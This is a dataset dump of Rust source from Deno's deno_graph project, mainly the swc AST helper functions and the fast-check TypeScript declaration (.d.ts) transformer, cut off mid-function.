export declare const name8: unknown;
declare const __deno_wasm_export_8__: unknown;
export { __deno_wasm_export_8__ as \"name9--\" };
declare const __deno_wasm_export_9__: unknown;
export { __deno_wasm_export_9__ as \"default\" };
"
);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/swc_helpers.rs | src/fast_check/swc_helpers.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::ops::ControlFlow;
use deno_ast::swc::ast::*;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::SyntaxContext;
pub fn new_ident(name: Atom) -> Ident {
Ident {
span: DUMMY_SP,
ctxt: Default::default(),
sym: name,
optional: false,
}
}
pub fn ts_keyword_type(kind: TsKeywordTypeKind) -> TsType {
TsType::TsKeywordType(TsKeywordType {
span: DUMMY_SP,
kind,
})
}
#[derive(Debug)]
pub enum ReturnStatementAnalysis {
/// There are no return statements in the function body.
None,
/// There are only return statements without arguments in the function body,
/// or if the function body is empty.
Void,
/// There is only a single return statement in the function body, and it has
/// an argument.
Single,
/// There are multiple return statements in the function body, and at least
/// one of them has an argument.
Multiple,
}
pub fn analyze_return_stmts_in_function_body(
body: &deno_ast::swc::ast::BlockStmt,
) -> ReturnStatementAnalysis {
if body.stmts.is_empty() {
ReturnStatementAnalysis::Void
} else {
let mut analysis = ReturnStatementAnalysis::None;
_ = analyze_return_stmts_from_stmts(&body.stmts, &mut analysis);
analysis
}
}
fn analyze_return_stmts_from_stmts(
stmts: &[Stmt],
analysis: &mut ReturnStatementAnalysis,
) -> ControlFlow<(), ()> {
for stmt in stmts {
analyze_return_stmts_from_stmt(stmt, analysis)?;
}
ControlFlow::Continue(())
}
fn analyze_return_stmts_from_stmt(
stmt: &Stmt,
analysis: &mut ReturnStatementAnalysis,
) -> ControlFlow<(), ()> {
match stmt {
Stmt::Block(n) => analyze_return_stmts_from_stmts(&n.stmts, analysis),
Stmt::With(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::Return(n) => {
match (&n.arg, &*analysis) {
(None, ReturnStatementAnalysis::None) => {
*analysis = ReturnStatementAnalysis::Void;
}
(None, ReturnStatementAnalysis::Void) => {}
(Some(_), ReturnStatementAnalysis::None)
| (Some(_), ReturnStatementAnalysis::Void) => {
*analysis = ReturnStatementAnalysis::Single;
}
(_, ReturnStatementAnalysis::Single) => {
*analysis = ReturnStatementAnalysis::Multiple;
return ControlFlow::Break(());
}
(_, ReturnStatementAnalysis::Multiple) => unreachable!(), // we break early when analysis is Multiple
}
ControlFlow::Continue(())
}
Stmt::Labeled(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::If(n) => analyze_return_stmts_from_stmt(&n.cons, analysis),
Stmt::Switch(n) => {
for case in &n.cases {
analyze_return_stmts_from_stmts(&case.cons, analysis)?;
}
ControlFlow::Continue(())
}
Stmt::Try(n) => {
analyze_return_stmts_from_stmts(&n.block.stmts, analysis)?;
if let Some(n) = &n.handler {
analyze_return_stmts_from_stmts(&n.body.stmts, analysis)?;
}
if let Some(n) = &n.finalizer {
analyze_return_stmts_from_stmts(&n.stmts, analysis)?;
}
ControlFlow::Continue(())
}
Stmt::While(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::DoWhile(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::For(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::ForIn(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::ForOf(n) => analyze_return_stmts_from_stmt(&n.body, analysis),
Stmt::Break(_)
| Stmt::Continue(_)
| Stmt::Throw(_)
| Stmt::Debugger(_)
| Stmt::Decl(_)
| Stmt::Expr(_)
| Stmt::Empty(_) => ControlFlow::Continue(()),
}
}
pub fn is_void_type(return_type: &TsType) -> bool {
is_keyword_type(return_type, TsKeywordTypeKind::TsVoidKeyword)
}
fn is_keyword_type(return_type: &TsType, kind: TsKeywordTypeKind) -> bool {
match return_type {
TsType::TsKeywordType(TsKeywordType { kind: k, .. }) => k == &kind,
_ => false,
}
}
pub fn any_type_ann() -> Box<TsTypeAnn> {
type_ann(ts_keyword_type(TsKeywordTypeKind::TsAnyKeyword))
}
pub fn ts_readonly(ann: TsType) -> TsType {
TsType::TsTypeOperator(TsTypeOperator {
span: DUMMY_SP,
op: TsTypeOperatorOp::ReadOnly,
type_ann: Box::new(ann),
})
}
pub fn type_ann(ts_type: TsType) -> Box<TsTypeAnn> {
Box::new(TsTypeAnn {
span: DUMMY_SP,
type_ann: Box::new(ts_type),
})
}
pub fn type_ref(name: Atom) -> TsTypeRef {
TsTypeRef {
span: DUMMY_SP,
type_name: TsEntityName::Ident(Ident::new(
name,
DUMMY_SP,
SyntaxContext::default(),
)),
type_params: None,
}
}
pub fn ts_lit_type(lit: TsLit) -> TsType {
TsType::TsLitType(TsLitType {
lit,
span: DUMMY_SP,
})
}
pub fn regex_type() -> TsType {
TsType::TsTypeRef(type_ref("RegExp".into()))
}
pub fn ts_tuple_element(ts_type: TsType) -> TsTupleElement {
TsTupleElement {
label: None,
span: DUMMY_SP,
ty: Box::new(ts_type),
}
}
pub enum DeclMutabilityKind {
Const,
Mutable,
}
pub fn maybe_lit_to_ts_type(
lit: &Lit,
decl_kind: DeclMutabilityKind,
) -> Option<TsType> {
match decl_kind {
DeclMutabilityKind::Const => match lit {
Lit::Str(lit_str) => Some(ts_lit_type(TsLit::Str(lit_str.clone()))),
Lit::Bool(lit_bool) => Some(ts_lit_type(TsLit::Bool(*lit_bool))),
Lit::Null(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNullKeyword)),
Lit::Num(lit_num) => Some(ts_lit_type(TsLit::Number(lit_num.clone()))),
Lit::BigInt(lit_bigint) => {
Some(ts_lit_type(TsLit::BigInt(lit_bigint.clone())))
}
Lit::Regex(_) => Some(regex_type()),
Lit::JSXText(_) => None,
},
DeclMutabilityKind::Mutable => match lit {
Lit::Str(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsStringKeyword)),
Lit::Bool(_) => {
Some(ts_keyword_type(TsKeywordTypeKind::TsBooleanKeyword))
}
Lit::Null(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNullKeyword)),
Lit::Num(_) => Some(ts_keyword_type(TsKeywordTypeKind::TsNumberKeyword)),
Lit::BigInt(_) => {
Some(ts_keyword_type(TsKeywordTypeKind::TsBigIntKeyword))
}
Lit::Regex(_) => Some(regex_type()),
Lit::JSXText(_) => None,
},
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/transform_dts.rs | src/fast_check/transform_dts.rs | use deno_ast::ModuleSpecifier;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::SourceTextInfo;
use deno_ast::swc::ast::*;
use deno_ast::swc::common::DUMMY_SP;
use deno_ast::swc::common::SyntaxContext;
use super::FastCheckDiagnosticRange;
use super::range_finder::ModulePublicRanges;
use super::swc_helpers::DeclMutabilityKind;
use super::swc_helpers::any_type_ann;
use super::swc_helpers::maybe_lit_to_ts_type;
use super::swc_helpers::ts_readonly;
use super::swc_helpers::ts_tuple_element;
use super::swc_helpers::type_ann;
#[derive(Debug, Clone, thiserror::Error)]
pub enum FastCheckDtsDiagnostic {
#[error("unable to infer type from expression or declaration")]
UnableToInferType { range: FastCheckDiagnosticRange },
#[error("unable to infer type, falling back to any type")]
UnableToInferTypeFallbackAny { range: FastCheckDiagnosticRange },
#[error("unable to infer type from object property, skipping")]
UnableToInferTypeFromProp { range: FastCheckDiagnosticRange },
#[error("unable to infer type from spread, skipping")]
UnableToInferTypeFromSpread { range: FastCheckDiagnosticRange },
#[error("cannot infer type from using, skipping")]
UnsupportedUsing { range: FastCheckDiagnosticRange },
}
impl FastCheckDtsDiagnostic {
pub fn specifier(&self) -> &ModuleSpecifier {
match self {
FastCheckDtsDiagnostic::UnableToInferType { range } => &range.specifier,
FastCheckDtsDiagnostic::UnableToInferTypeFallbackAny { range } => {
&range.specifier
}
FastCheckDtsDiagnostic::UnableToInferTypeFromProp { range } => {
&range.specifier
}
FastCheckDtsDiagnostic::UnableToInferTypeFromSpread { range } => {
&range.specifier
}
FastCheckDtsDiagnostic::UnsupportedUsing { range } => &range.specifier,
}
}
pub fn range(&self) -> &FastCheckDiagnosticRange {
match self {
FastCheckDtsDiagnostic::UnableToInferType { range } => range,
FastCheckDtsDiagnostic::UnableToInferTypeFallbackAny { range } => range,
FastCheckDtsDiagnostic::UnableToInferTypeFromProp { range } => range,
FastCheckDtsDiagnostic::UnableToInferTypeFromSpread { range } => range,
FastCheckDtsDiagnostic::UnsupportedUsing { range } => range,
}
}
}
pub struct FastCheckDtsTransformer<'a> {
id_counter: usize,
text_info: &'a SourceTextInfo,
public_ranges: &'a ModulePublicRanges,
pub diagnostics: Vec<FastCheckDtsDiagnostic>,
specifier: &'a ModuleSpecifier,
is_top_level: bool,
}
impl<'a> FastCheckDtsTransformer<'a> {
pub fn new(
text_info: &'a SourceTextInfo,
public_ranges: &'a ModulePublicRanges,
specifier: &'a ModuleSpecifier,
) -> Self {
Self {
id_counter: 0,
text_info,
specifier,
public_ranges,
diagnostics: vec![],
is_top_level: true,
}
}
fn gen_unique_name(&mut self) -> String {
self.id_counter += 1;
format!("_dts_{}", self.id_counter)
}
fn mark_diagnostic(&mut self, diagnostic: FastCheckDtsDiagnostic) {
self.diagnostics.push(diagnostic)
}
fn source_range_to_range(
&self,
range: SourceRange,
) -> FastCheckDiagnosticRange {
FastCheckDiagnosticRange {
specifier: self.specifier.clone(),
text_info: self.text_info.clone(),
range,
}
}
fn mark_diagnostic_unable_to_infer(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferType {
range: self.source_range_to_range(range),
})
}
fn mark_diagnostic_any_fallback(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferTypeFallbackAny {
range: self.source_range_to_range(range),
})
}
fn mark_diagnostic_unsupported_prop(&mut self, range: SourceRange) {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnableToInferTypeFromProp {
range: self.source_range_to_range(range),
})
}
pub fn transform(&mut self, program: Program) -> Program {
self.is_top_level = true;
match program {
Program::Module(mut module) => {
let body = module.body;
module.body = self.transform_module_items(body);
Program::Module(module)
}
Program::Script(mut script) => {
script.body = script
.body
.into_iter()
.filter_map(|stmt| {
let new_stmt = self.transform_module_stmt(stmt)?;
Some(new_stmt)
})
.collect();
Program::Script(script)
}
}
}
fn transform_module_items(
&mut self,
body: Vec<ModuleItem>,
) -> Vec<ModuleItem> {
let mut new_items: Vec<ModuleItem> = vec![];
for item in body {
match item {
ModuleItem::ModuleDecl(module_decl) => match module_decl {
ModuleDecl::Import(_) => {
new_items.push(ModuleItem::ModuleDecl(module_decl));
}
ModuleDecl::ExportDecl(export_decl) => {
if let Decl::Fn(_) = &export_decl.decl
&& self
.public_ranges
.is_impl_with_overloads(&export_decl.range())
{
continue; // skip implementation signature
}
match self.decl_to_type_decl(export_decl.decl.clone()) {
Some(decl) => {
new_items.push(ModuleItem::ModuleDecl(ModuleDecl::ExportDecl(
ExportDecl {
decl,
span: export_decl.span,
},
)));
}
_ => self.mark_diagnostic(
FastCheckDtsDiagnostic::UnableToInferType {
range: self.source_range_to_range(export_decl.range()),
},
),
}
}
ModuleDecl::ExportDefaultDecl(export_decl) => {
let value = match export_decl.decl {
DefaultDecl::Class(mut class_expr) => {
class_expr.class.body =
self.class_body_to_type(class_expr.class.body);
ExportDefaultDecl {
span: export_decl.span,
decl: DefaultDecl::Class(class_expr),
}
}
DefaultDecl::Fn(mut fn_expr) => {
if self
.public_ranges
.is_impl_with_overloads(&export_decl.span.range())
{
continue; // skip implementation signature
}
fn_expr.function.body = None;
ExportDefaultDecl {
span: export_decl.span,
decl: DefaultDecl::Fn(fn_expr),
}
}
DefaultDecl::TsInterfaceDecl(_) => export_decl,
};
new_items.push(ModuleItem::ModuleDecl(
ModuleDecl::ExportDefaultDecl(value),
))
}
ModuleDecl::ExportDefaultExpr(export_default_expr) => {
let name = self.gen_unique_name();
let name_ident =
Ident::new(name.into(), DUMMY_SP, SyntaxContext::default());
let type_ann = self
.expr_to_ts_type(*export_default_expr.expr.clone(), false, true)
.map(type_ann);
if let Some(type_ann) = type_ann {
new_items.push(ModuleItem::Stmt(Stmt::Decl(Decl::Var(
Box::new(VarDecl {
span: DUMMY_SP,
ctxt: Default::default(),
kind: VarDeclKind::Const,
declare: true,
decls: vec![VarDeclarator {
span: DUMMY_SP,
name: Pat::Ident(BindingIdent {
id: name_ident.clone(),
type_ann: Some(type_ann),
}),
init: None,
definite: false,
}],
}),
))));
new_items.push(ModuleItem::ModuleDecl(
ModuleDecl::ExportDefaultExpr(ExportDefaultExpr {
span: export_default_expr.span,
expr: Box::new(Expr::Ident(name_ident)),
}),
))
} else {
new_items.push(ModuleItem::ModuleDecl(
ModuleDecl::ExportDefaultExpr(ExportDefaultExpr {
span: export_default_expr.span,
expr: export_default_expr.expr,
}),
))
}
}
// Keep all these
ModuleDecl::TsImportEquals(_)
| ModuleDecl::TsNamespaceExport(_)
| ModuleDecl::TsExportAssignment(_)
| ModuleDecl::ExportNamed(_)
| ModuleDecl::ExportAll(_) => {
new_items.push(ModuleItem::ModuleDecl(module_decl));
}
},
ModuleItem::Stmt(stmt) => {
if let Some(new_stmt) = self.transform_module_stmt(stmt) {
new_items.push(ModuleItem::Stmt(new_stmt));
}
}
}
}
new_items
}
fn transform_module_stmt(&mut self, stmt: Stmt) -> Option<Stmt> {
let Stmt::Decl(decl) = stmt else {
return None;
};
if let Decl::Fn(_) = &decl
&& self.public_ranges.is_impl_with_overloads(&decl.range())
{
return None; // skip implementation signature
}
match decl {
Decl::TsEnum(_)
| Decl::Class(_)
| Decl::Fn(_)
| Decl::Var(_)
| Decl::TsModule(_) => match self.decl_to_type_decl(decl.clone()) {
Some(decl) => Some(Stmt::Decl(decl)),
_ => {
self.mark_diagnostic_unable_to_infer(decl.range());
None
}
},
Decl::TsInterface(_) | Decl::TsTypeAlias(_) | Decl::Using(_) => {
Some(Stmt::Decl(decl))
}
}
}
fn expr_to_ts_type(
&mut self,
expr: Expr,
as_const: bool,
as_readonly: bool,
) -> Option<TsType> {
match expr {
Expr::Array(arr) => {
let mut elem_types: Vec<TsTupleElement> = vec![];
for elems in arr.elems {
if let Some(expr_or_spread) = elems {
match self.expr_to_ts_type(
*expr_or_spread.expr.clone(),
as_const,
as_readonly,
) {
Some(ts_expr) => {
elem_types.push(ts_tuple_element(ts_expr));
}
_ => {
self.mark_diagnostic_unable_to_infer(expr_or_spread.range());
}
}
} else {
// TypeScript converts holey arrays to any
// Example: const a = [,,] -> const a = [any, any, any]
elem_types.push(ts_tuple_element(TsType::TsKeywordType(
TsKeywordType {
kind: TsKeywordTypeKind::TsAnyKeyword,
span: DUMMY_SP,
},
)))
}
}
let mut result = TsType::TsTupleType(TsTupleType {
span: arr.span,
elem_types,
});
if as_readonly {
result = ts_readonly(result);
}
Some(result)
}
Expr::Object(obj) => {
let mut members: Vec<TsTypeElement> = vec![];
// TODO: Prescan all object properties to know which ones
// have a getter or a setter. This allows us to apply
// TypeScript's `readonly` keyword accordingly.
for item in obj.props {
match item {
PropOrSpread::Prop(prop_box) => {
let prop = *prop_box;
match prop {
Prop::KeyValue(key_value) => {
let (key, computed) = match key_value.key {
PropName::Ident(ident_name) => (
Expr::Ident(Ident {
span: ident_name.span,
ctxt: SyntaxContext::default(),
sym: ident_name.sym,
optional: false,
}),
false,
),
PropName::Str(str_prop) => {
(Expr::Lit(Lit::Str(str_prop)), false)
}
PropName::Num(num) => (Expr::Lit(Lit::Num(num)), true),
PropName::Computed(computed) => (*computed.expr, true),
PropName::BigInt(big_int) => {
(Expr::Lit(Lit::BigInt(big_int)), true)
}
};
let init_type = self
.expr_to_ts_type(*key_value.value, as_const, as_readonly)
.map(type_ann);
members.push(TsTypeElement::TsPropertySignature(
TsPropertySignature {
span: DUMMY_SP,
readonly: as_readonly,
key: Box::new(key),
computed,
optional: false,
type_ann: init_type,
},
));
}
Prop::Shorthand(_)
| Prop::Assign(_)
| Prop::Getter(_)
| Prop::Setter(_)
| Prop::Method(_) => {
self.mark_diagnostic_unsupported_prop(prop.range());
}
}
}
PropOrSpread::Spread(_) => self.mark_diagnostic(
FastCheckDtsDiagnostic::UnableToInferTypeFromSpread {
range: self.source_range_to_range(item.range()),
},
),
}
}
Some(TsType::TsTypeLit(TsTypeLit {
span: obj.span,
members,
}))
}
Expr::Lit(lit) => maybe_lit_to_ts_type(
&lit,
match as_const {
true => DeclMutabilityKind::Const,
false => DeclMutabilityKind::Mutable,
},
),
Expr::TsConstAssertion(ts_const) => {
self.expr_to_ts_type(*ts_const.expr, true, true)
}
Expr::TsSatisfies(satisifies) => {
self.expr_to_ts_type(*satisifies.expr, as_const, as_readonly)
}
Expr::TsAs(ts_as) => Some(*ts_as.type_ann),
Expr::Fn(fn_expr) => {
let return_type = fn_expr
.function
.return_type
.map_or(any_type_ann(), |val| val);
let params: Vec<TsFnParam> = fn_expr
.function
.params
.into_iter()
.filter_map(|param| self.pat_to_ts_fn_param(param.pat))
.collect();
Some(TsType::TsFnOrConstructorType(
TsFnOrConstructorType::TsFnType(TsFnType {
span: fn_expr.function.span,
params,
type_ann: return_type,
type_params: fn_expr.function.type_params,
}),
))
}
Expr::Arrow(arrow_expr) => {
let return_type =
arrow_expr.return_type.map_or(any_type_ann(), |val| val);
let params = arrow_expr
.params
.into_iter()
.filter_map(|pat| self.pat_to_ts_fn_param(pat))
.collect();
Some(TsType::TsFnOrConstructorType(
TsFnOrConstructorType::TsFnType(TsFnType {
span: arrow_expr.span,
params,
type_ann: return_type,
type_params: arrow_expr.type_params,
}),
))
}
// Since fast check requires explicit type annotations these
// can be dropped as they are not part of an export declaration
Expr::This(_)
| Expr::Unary(_)
| Expr::Update(_)
| Expr::Bin(_)
| Expr::Assign(_)
| Expr::Member(_)
| Expr::SuperProp(_)
| Expr::Cond(_)
| Expr::Call(_)
| Expr::New(_)
| Expr::Seq(_)
| Expr::Ident(_)
| Expr::Tpl(_)
| Expr::TaggedTpl(_)
| Expr::Class(_)
| Expr::Yield(_)
| Expr::MetaProp(_)
| Expr::Await(_)
| Expr::Paren(_)
| Expr::JSXMember(_)
| Expr::JSXNamespacedName(_)
| Expr::JSXEmpty(_)
| Expr::JSXElement(_)
| Expr::JSXFragment(_)
| Expr::TsTypeAssertion(_)
| Expr::TsNonNull(_)
| Expr::TsInstantiation(_)
| Expr::PrivateName(_)
| Expr::OptChain(_)
| Expr::Invalid(_) => None,
}
}
fn decl_to_type_decl(&mut self, decl: Decl) -> Option<Decl> {
let is_declare = self.is_top_level;
match decl {
Decl::Class(mut class_decl) => {
class_decl.class.body = self.class_body_to_type(class_decl.class.body);
class_decl.declare = is_declare;
Some(Decl::Class(class_decl))
}
Decl::Fn(mut fn_decl) => {
fn_decl.function.body = None;
fn_decl.declare = is_declare;
self.handle_func_params(&mut fn_decl.function.params);
Some(Decl::Fn(fn_decl))
}
Decl::Var(mut var_decl) => {
var_decl.declare = is_declare;
for decl in &mut var_decl.decls {
if let Pat::Ident(ident) = &mut decl.name {
if ident.type_ann.is_some() {
decl.init = None;
continue;
}
let ts_type = decl
.init
.as_ref()
.and_then(|init_box| {
let init = *init_box.clone();
self.expr_to_ts_type(init, false, true)
})
.map(type_ann)
.or_else(|| {
self.mark_diagnostic_any_fallback(ident.range());
Some(any_type_ann())
});
ident.type_ann = ts_type;
} else {
self.mark_diagnostic_unable_to_infer(decl.range());
}
decl.init = None;
}
Some(Decl::Var(var_decl))
}
Decl::TsEnum(mut ts_enum) => {
ts_enum.declare = is_declare;
for member in &mut ts_enum.members {
if let Some(init) = &member.init {
// Support for expressions is limited in enums,
// see https://www.typescriptlang.org/docs/handbook/enums.html
member.init = if self.valid_enum_init_expr(*init.clone()) {
Some(init.clone())
} else {
None
};
}
}
Some(Decl::TsEnum(ts_enum))
}
Decl::TsModule(mut ts_module) => {
ts_module.declare = is_declare;
match ts_module.body.clone() {
Some(body) => {
ts_module.body = Some(self.transform_ts_ns_body(body));
Some(Decl::TsModule(ts_module))
}
_ => Some(Decl::TsModule(ts_module)),
}
}
Decl::TsInterface(_) | Decl::TsTypeAlias(_) => Some(decl),
Decl::Using(_) => {
self.mark_diagnostic(FastCheckDtsDiagnostic::UnsupportedUsing {
range: self.source_range_to_range(decl.range()),
});
None
}
}
}
fn transform_ts_ns_body(&mut self, ns: TsNamespaceBody) -> TsNamespaceBody {
let original_is_top_level = self.is_top_level;
self.is_top_level = false;
let body = match ns {
TsNamespaceBody::TsModuleBlock(mut ts_module_block) => {
ts_module_block.body =
self.transform_module_items(ts_module_block.body);
TsNamespaceBody::TsModuleBlock(ts_module_block)
}
TsNamespaceBody::TsNamespaceDecl(ts_ns) => {
self.transform_ts_ns_body(*ts_ns.body)
}
};
self.is_top_level = original_is_top_level;
body
}
// Support for expressions is limited in enums,
// see https://www.typescriptlang.org/docs/handbook/enums.html
fn valid_enum_init_expr(&mut self, expr: Expr) -> bool {
match expr {
Expr::Bin(bin_expr) => {
if !self.valid_enum_init_expr(*bin_expr.left) {
false
} else {
self.valid_enum_init_expr(*bin_expr.right)
}
}
Expr::Member(member_expr) => self.valid_enum_init_expr(*member_expr.obj),
Expr::OptChain(opt_expr) => match *opt_expr.base {
OptChainBase::Member(member_expr) => {
self.valid_enum_init_expr(Expr::Member(member_expr))
}
OptChainBase::Call(_) => false,
},
// TS does infer the type of identifiers
Expr::Ident(_) => true,
Expr::Lit(lit) => match lit {
Lit::Num(_) | Lit::Str(_) => true,
Lit::Bool(_)
| Lit::Null(_)
| Lit::BigInt(_)
| Lit::Regex(_)
| Lit::JSXText(_) => false,
},
Expr::Tpl(tpl_expr) => {
for expr in tpl_expr.exprs {
if !self.valid_enum_init_expr(*expr) {
return false;
}
}
true
}
Expr::Paren(paren_expr) => self.valid_enum_init_expr(*paren_expr.expr),
Expr::TsTypeAssertion(ts_ass) => {
// Only assertions to number are allowed for computed
// enum members.
match *ts_ass.type_ann {
TsType::TsLitType(ts_lit) => match ts_lit.lit {
TsLit::Number(_) => true,
TsLit::Str(_)
| TsLit::Bool(_)
| TsLit::BigInt(_)
| TsLit::Tpl(_) => false,
},
TsType::TsKeywordType(_)
| TsType::TsThisType(_)
| TsType::TsFnOrConstructorType(_)
| TsType::TsTypeRef(_)
| TsType::TsTypeQuery(_)
| TsType::TsTypeLit(_)
| TsType::TsArrayType(_)
| TsType::TsTupleType(_)
| TsType::TsOptionalType(_)
| TsType::TsRestType(_)
| TsType::TsUnionOrIntersectionType(_)
| TsType::TsConditionalType(_)
| TsType::TsInferType(_)
| TsType::TsParenthesizedType(_)
| TsType::TsTypeOperator(_)
| TsType::TsIndexedAccessType(_)
| TsType::TsMappedType(_)
| TsType::TsTypePredicate(_)
| TsType::TsImportType(_) => false,
}
}
Expr::TsAs(ts_as) => self.valid_enum_ts_type(*ts_as.type_ann),
// These are not valid as enum member initializer and
// TS will throw a type error. For declaration generation
// they will be dropped in TS so we do that too.
Expr::TsInstantiation(_)
| Expr::Call(_)
| Expr::Update(_)
| Expr::PrivateName(_)
| Expr::TsSatisfies(_)
| Expr::TsNonNull(_)
| Expr::TsConstAssertion(_)
| Expr::Cond(_)
| Expr::Seq(_)
| Expr::TaggedTpl(_)
| Expr::Object(_)
| Expr::Array(_)
| Expr::Arrow(_)
| Expr::Class(_)
| Expr::Await(_)
| Expr::MetaProp(_)
| Expr::New(_)
| Expr::JSXMember(_)
| Expr::JSXNamespacedName(_)
| Expr::JSXEmpty(_)
| Expr::JSXElement(_)
| Expr::JSXFragment(_)
| Expr::Unary(_)
| Expr::Assign(_)
| Expr::Yield(_)
| Expr::SuperProp(_)
| Expr::Fn(_)
| Expr::This(_)
| Expr::Invalid(_) => false,
}
}
fn valid_enum_ts_type(&mut self, ts_type: TsType) -> bool {
match ts_type {
TsType::TsLitType(ts_lit) => match ts_lit.lit {
TsLit::Number(_) => true,
TsLit::Str(_) | TsLit::Bool(_) | TsLit::BigInt(_) | TsLit::Tpl(_) => {
false
}
},
TsType::TsKeywordType(_)
| TsType::TsThisType(_)
| TsType::TsFnOrConstructorType(_)
| TsType::TsTypeRef(_)
| TsType::TsTypeQuery(_)
| TsType::TsTypeLit(_)
| TsType::TsArrayType(_)
| TsType::TsTupleType(_)
| TsType::TsOptionalType(_)
| TsType::TsRestType(_)
| TsType::TsUnionOrIntersectionType(_)
| TsType::TsConditionalType(_)
| TsType::TsInferType(_)
| TsType::TsParenthesizedType(_)
| TsType::TsTypeOperator(_)
| TsType::TsIndexedAccessType(_)
| TsType::TsMappedType(_)
| TsType::TsTypePredicate(_)
| TsType::TsImportType(_) => false,
}
}
fn infer_expr_fallback_any(
&mut self,
expr: Expr,
as_const: bool,
as_readonly: bool,
) -> Box<TsTypeAnn> {
match self.expr_to_ts_type(expr.clone(), as_const, as_readonly) {
Some(ts_type) => type_ann(ts_type),
_ => {
self.mark_diagnostic_any_fallback(expr.range());
any_type_ann()
}
}
}
fn class_body_to_type(&mut self, body: Vec<ClassMember>) -> Vec<ClassMember> {
body
.into_iter()
.filter(|member| match member {
ClassMember::Constructor(constructor) => !self
.public_ranges
.is_impl_with_overloads(&constructor.range()),
ClassMember::Method(method) => {
!self.public_ranges.is_impl_with_overloads(&method.range())
}
ClassMember::TsIndexSignature(_)
| ClassMember::ClassProp(_)
| ClassMember::PrivateProp(_)
| ClassMember::Empty(_)
| ClassMember::StaticBlock(_)
| ClassMember::AutoAccessor(_)
| ClassMember::PrivateMethod(_) => true,
})
.filter_map(|member| match member {
ClassMember::Constructor(mut class_constructor) => {
class_constructor.body = None;
self.handle_ts_param_props(&mut class_constructor.params);
Some(ClassMember::Constructor(class_constructor))
}
ClassMember::Method(mut method) => {
match valid_prop_name(&method.key) {
Some(new_prop_name) => {
method.key = new_prop_name;
}
_ => {
return None;
}
}
method.function.body = None;
if method.kind == MethodKind::Setter {
method.function.return_type = None;
}
self.handle_func_params(&mut method.function.params);
Some(ClassMember::Method(method))
}
ClassMember::ClassProp(mut prop) => {
match valid_prop_name(&prop.key) {
Some(new_prop_name) => {
prop.key = new_prop_name;
}
_ => {
return None;
}
}
if prop.type_ann.is_none()
&& let Some(value) = prop.value
{
prop.type_ann = self
.expr_to_ts_type(*value, false, false)
.map(type_ann)
.or_else(|| Some(any_type_ann()));
}
prop.value = None;
prop.definite = false;
prop.declare = false;
Some(ClassMember::ClassProp(prop))
}
ClassMember::TsIndexSignature(index_sig) => {
Some(ClassMember::TsIndexSignature(index_sig))
}
// These can be removed as they are not relevant for types
ClassMember::PrivateMethod(_)
| ClassMember::PrivateProp(_)
| ClassMember::Empty(_)
| ClassMember::StaticBlock(_)
| ClassMember::AutoAccessor(_) => None,
})
.collect()
}
fn handle_ts_param_props(
&mut self,
param_props: &mut Vec<ParamOrTsParamProp>,
) {
for param in param_props {
match param {
ParamOrTsParamProp::TsParamProp(param) => {
match &mut param.param {
TsParamPropParam::Ident(ident) => {
self.handle_func_param_ident(ident);
}
TsParamPropParam::Assign(assign) => {
if let Some(new_pat) = self.handle_func_param_assign(assign) {
match new_pat {
Pat::Ident(new_ident) => {
param.param = TsParamPropParam::Ident(new_ident)
}
Pat::Assign(new_assign) => {
param.param = TsParamPropParam::Assign(new_assign)
}
Pat::Rest(_)
| Pat::Object(_)
| Pat::Array(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {
// should never happen for parameter properties
unreachable!();
}
}
}
}
}
}
ParamOrTsParamProp::Param(param) => self.handle_func_param(param),
}
}
}
fn handle_func_params(&mut self, params: &mut Vec<Param>) {
for param in params {
self.handle_func_param(param);
}
}
fn handle_func_param(&mut self, param: &mut Param) {
match &mut param.pat {
Pat::Ident(ident) => {
self.handle_func_param_ident(ident);
}
Pat::Assign(assign_pat) => {
if let Some(new_pat) = self.handle_func_param_assign(assign_pat) {
param.pat = new_pat;
}
}
Pat::Array(_)
| Pat::Rest(_)
| Pat::Object(_)
| Pat::Invalid(_)
| Pat::Expr(_) => {}
}
}
fn handle_func_param_ident(&mut self, ident: &mut BindingIdent) {
if ident.type_ann.is_none() {
self.mark_diagnostic_any_fallback(ident.range());
ident.type_ann = Some(any_type_ann());
}
}
fn handle_func_param_assign(
&mut self,
assign_pat: &mut AssignPat,
) -> Option<Pat> {
match &mut *assign_pat.left {
Pat::Ident(ident) => {
if ident.type_ann.is_none() {
ident.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
ident.optional = true;
Some(Pat::Ident(ident.clone()))
}
Pat::Array(arr_pat) => {
if arr_pat.type_ann.is_none() {
arr_pat.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
arr_pat.optional = true;
Some(Pat::Array(arr_pat.clone()))
}
Pat::Object(obj_pat) => {
if obj_pat.type_ann.is_none() {
obj_pat.type_ann = Some(self.infer_expr_fallback_any(
*assign_pat.right.clone(),
false,
false,
));
}
obj_pat.optional = true;
Some(Pat::Object(obj_pat.clone()))
}
Pat::Rest(_) | Pat::Assign(_) | Pat::Expr(_) | Pat::Invalid(_) => None,
}
}
fn pat_to_ts_fn_param(&mut self, pat: Pat) -> Option<TsFnParam> {
match pat {
